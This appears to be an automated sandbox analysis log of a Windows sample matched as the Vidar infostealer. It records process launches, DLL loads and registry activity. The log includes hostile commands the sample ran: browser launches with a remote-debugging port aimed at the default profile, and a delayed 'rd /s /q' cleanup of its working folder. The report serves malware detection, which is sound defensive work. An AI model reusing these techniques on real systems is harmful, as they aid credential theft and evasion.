                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_0041C4505_2_0041C450
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_0041B0B05_2_0041B0B0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_0041A3405_2_0041A340
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_0041DD605_2_0041DD60
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_0041CF705_2_0041CF70
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_0041D3F05_2_0041D3F0
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: String function: 008914C4 appears 34 times
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: String function: 0088D05E appears 42 times
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: String function: 00410340 appears 127 times
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: String function: 00404DF0 appears 77 times
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: String function: 004119B0 appears 43 times
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: String function: 008841E0 appears 94 times
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6408 -s 372
                  Source: aD7D9fkpII.exe, 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs aD7D9fkpII.exe
                  Source: aD7D9fkpII.exe, 00000000.00000002.2333287730.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs aD7D9fkpII.exe
                  Source: aD7D9fkpII.exe, 00000002.00000000.2048948262.00000000008D9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs aD7D9fkpII.exe
                  Source: aD7D9fkpII.exe, 00000004.00000000.2049738316.00000000008D9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs aD7D9fkpII.exe
                  Source: aD7D9fkpII.exe, 00000005.00000002.2772309612.00000000008D9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs aD7D9fkpII.exe
                  Source: aD7D9fkpII.exe, 00000005.00000002.2777956578.0000000004A12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs aD7D9fkpII.exe
                  Source: aD7D9fkpII.exeBinary or memory string: OriginalFilenameRpcPing.exej% vs aD7D9fkpII.exe
                  Source: aD7D9fkpII.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 5.2.aD7D9fkpII.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: 5.2.aD7D9fkpII.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                  Source: aD7D9fkpII.exeStatic PE information: Section: .bss ZLIB complexity 1.0003784602076125
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@76/282@24/20
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 5_2_00412050 CreateToolhelp32Snapshot,Process32First,Process32Next,TerminateProcess,5_2_00412050
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\HK8O7K70.htmJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6408
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\4b1511d8-17d1-4a89-a59c-e254308c8f98Jump to behavior
                  Source: aD7D9fkpII.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: chrome.exe, 0000000B.00000002.2324211904.00001E9000553000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                  Source: 4W4EKNGVA.5.dr, D2NGDB16F.5.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: aD7D9fkpII.exeVirustotal: Detection: 56%
                  Source: aD7D9fkpII.exeReversingLabs: Detection: 71%
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeFile read: C:\Users\user\Desktop\aD7D9fkpII.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\aD7D9fkpII.exe "C:\Users\user\Desktop\aD7D9fkpII.exe"
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Users\user\Desktop\aD7D9fkpII.exe "C:\Users\user\Desktop\aD7D9fkpII.exe"
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Users\user\Desktop\aD7D9fkpII.exe "C:\Users\user\Desktop\aD7D9fkpII.exe"
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Users\user\Desktop\aD7D9fkpII.exe "C:\Users\user\Desktop\aD7D9fkpII.exe"
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6408 -s 372
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2304,i,13937775269766581777,3924065134902446641,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2704 --field-trial-handle=2636,i,10720928867294864621,14474913477084532862,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2124,i,17907551235246420035,16935429163833777043,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6544 --field-trial-handle=2124,i,17907551235246420035,16935429163833777043,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6728 --field-trial-handle=2124,i,17907551235246420035,16935429163833777043,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\TRQ9ZCBA1N7Q" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6640 --field-trial-handle=2124,i,17907551235246420035,16935429163833777043,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Users\user\Desktop\aD7D9fkpII.exe "C:\Users\user\Desktop\aD7D9fkpII.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Users\user\Desktop\aD7D9fkpII.exe "C:\Users\user\Desktop\aD7D9fkpII.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Users\user\Desktop\aD7D9fkpII.exe "C:\Users\user\Desktop\aD7D9fkpII.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\TRQ9ZCBA1N7Q" & exitJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2304,i,13937775269766581777,3924065134902446641,262144 /prefetch:8Jump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2704 --field-trial-handle=2636,i,10720928867294864621,14474913477084532862,262144 /prefetch:3Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2124,i,17907551235246420035,16935429163833777043,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6544 --field-trial-handle=2124,i,17907551235246420035,16935429163833777043,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6728 --field-trial-handle=2124,i,17907551235246420035,16935429163833777043,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6640 --field-trial-handle=2124,i,17907551235246420035,16935429163833777043,262144 /prefetch:8
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: Google Drive.lnk.11.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: YouTube.lnk.11.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Sheets.lnk.11.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Gmail.lnk.11.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Slides.lnk.11.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Docs.lnk.11.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: aD7D9fkpII.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                  Source: aD7D9fkpII.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: aD7D9fkpII.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: aD7D9fkpII.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: aD7D9fkpII.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: aD7D9fkpII.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 0_2_00884303 push ecx; ret 0_2_00884316
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeCode function: 2_2_00884303 push ecx; ret 2_2_00884316

                  Boot Survival

                  barindex
                  Monitors registry run keys for changes
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\aD7D9fkpII.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
